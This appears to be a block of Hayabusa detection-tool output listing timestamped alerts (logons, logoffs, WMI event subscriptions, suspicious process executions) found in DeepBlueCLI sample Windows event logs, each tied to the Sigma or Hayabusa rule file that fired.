4122013-10-24 06:13:38.283 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x25519 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4132013-10-24 06:13:38.283 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2553c : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4142013-10-24 06:13:38.283 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x25519rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4152013-10-24 06:35:27.013 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4162013-10-24 06:35:27.013 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4172013-10-24 06:35:27.028 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4182013-10-24 06:50:27.138 +09:00IE8Win74648informationalExplicit LogonSource User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.localrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4192013-10-24 06:53:45.841 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4202013-10-24 06:53:45.841 +09:00IE8Win74624informationalLogon Type 4 - BatchUser: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f454rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4212013-10-24 06:53:45.841 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x15f454rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4222013-10-24 06:53:45.919 +09:00IE8Win74634informationalLogoffUser: IEUser : LogonID: 0x15f454rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4232013-10-24 06:53:46.263 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4242013-10-24 06:53:46.263 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4252013-10-24 06:53:46.263 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f546 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4262013-10-24 06:53:46.263 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x15f53arules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4272013-10-24 06:53:46.669 +09:00IE8Win74634informationalLogoffUser: IEUser : LogonID: 0x15f546rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4282013-10-24 06:53:46.669 +09:00IE8Win74634informationalLogoffUser: IEUser : LogonID: 0x15f53arules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4292013-10-24 06:54:01.732 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x2553crules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4302013-10-24 06:55:02.343 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4312013-10-24 06:55:02.343 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4322013-10-24 06:55:25.000 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4332013-10-24 06:55:32.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4342013-10-24 06:55:35.625 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4352013-10-24 06:55:35.625 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4362013-10-24 06:55:35.625 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdafc : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4372013-10-24 06:55:35.625 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0xdad4rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4382013-10-24 06:55:37.450 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4392013-10-24 06:55:37.450 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4402013-10-24 06:55:37.450 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4412013-10-24 06:55:44.840 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4422013-10-24 06:55:44.840 +09:00IE8Win74624informationalLogon Type 4 - BatchUser: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x13dbcrules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4432013-10-24 06:55:44.840 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x13dbcrules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4442013-10-24 06:57:51.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4452013-10-24 06:57:51.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4462013-10-24 07:00:55.356 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0xdafcrules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4472013-10-24 07:00:55.903 +09:00IE8Win74634informationalLogoffUser: IEUser : LogonID: 0xdafcrules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4482013-10-24 07:00:55.903 +09:00IE8Win74634informationalLogoffUser: IEUser : LogonID: 0xdad4rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4492013-10-24 07:01:28.840 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4502013-10-24 07:01:28.840 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4512013-10-24 07:01:28.840 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4522013-10-24 07:01:28.840 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x4bafcrules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4532013-10-24 07:04:16.809 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x4bb14rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4542013-10-24 07:05:00.218 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4552013-10-24 07:05:00.218 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4562013-10-24 07:05:21.859 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4572013-10-24 07:05:31.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4582013-10-24 07:05:32.609 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4592013-10-24 07:05:32.609 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd99e : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4602013-10-24 07:05:32.609 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4612013-10-24 07:05:32.609 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0xd99erules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4622013-10-24 07:05:36.944 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4632013-10-24 07:05:36.944 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4642013-10-24 07:05:36.944 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4652013-10-24 07:05:40.928 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4662013-10-24 07:05:40.928 +09:00IE8Win74624informationalLogon Type 4 - BatchUser: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x144dfrules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4672013-10-24 07:05:40.928 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x144dfrules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4682013-10-24 07:08:00.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4692013-10-24 07:08:00.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4702013-10-24 07:10:10.631 +09:00IE8Win79mediumRaw Disk Access Using Illegitimate Toolsrules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4712013-10-24 08:11:15.779 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4722013-10-24 08:11:15.779 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4732013-10-24 08:11:15.779 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4742014-11-22 08:29:47.424 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4752014-11-22 08:29:47.424 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4762014-11-22 08:29:47.424 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4772014-11-22 08:29:47.424 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4782014-11-22 08:29:47.424 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4792014-11-22 08:29:47.424 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4802014-11-22 08:29:47.424 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4812014-11-22 08:29:47.517 +09:00IE8Win79mediumRaw Disk Access Using Illegitimate Toolsrules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4822014-11-22 08:30:12.392 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4832014-11-22 08:30:12.392 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4842014-11-22 08:32:12.657 +09:00IE8Win74634informationalLogoffUser: IEUser : LogonID: 0x144dfrules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4852014-11-22 08:34:00.063 +09:00IE8Win74648informationalExplicit LogonSource User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.localrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4862014-11-22 08:40:48.532 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0xd9c6rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4872014-11-22 08:42:11.390 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4882014-11-22 08:42:11.390 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4892014-11-22 08:42:34.625 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4902014-11-22 08:42:43.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4912014-11-22 08:42:49.610 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4922014-11-22 08:42:49.610 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4932014-11-22 08:42:49.610 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4942014-11-22 08:43:06.625 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4952014-11-22 08:43:06.625 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16559 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4962014-11-22 08:43:06.625 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16589 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4972014-11-22 08:43:06.625 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x16559rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4982014-11-22 08:44:23.818 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4992014-11-22 08:44:23.818 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5002014-11-22 08:44:23.849 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5012014-11-22 08:45:01.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
5022014-11-22 08:45:01.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
5032014-11-22 08:45:09.380 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5042014-11-22 08:45:09.380 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5052014-11-22 08:45:09.380 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5062014-11-22 09:34:55.380 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5072014-11-22 09:37:57.755 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5082014-11-22 09:44:32.677 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x16589rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5092014-11-22 09:53:07.927 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5102014-11-22 10:07:45.896 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5112014-11-22 10:13:36.380 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5122014-11-22 10:21:57.052 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5132014-11-22 10:36:35.927 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5142014-11-22 10:38:16.943 +09:00IE8Win721highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5152014-11-24 14:07:11.015 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5162014-11-24 14:07:11.015 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5172014-11-24 14:07:26.562 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5182014-11-24 14:07:38.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
5192014-11-24 14:07:42.189 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5202014-11-24 14:07:42.189 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5212014-11-24 14:07:42.189 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5222014-11-24 14:08:08.126 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5232014-11-24 14:08:08.126 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5242014-11-24 14:08:08.126 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5252014-11-24 14:08:08.126 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x2b7c0rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5262014-11-24 14:09:50.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
5272014-11-24 14:09:50.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
5282014-11-24 14:11:00.564 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5292014-11-24 14:11:00.564 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5302014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5312014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5322014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
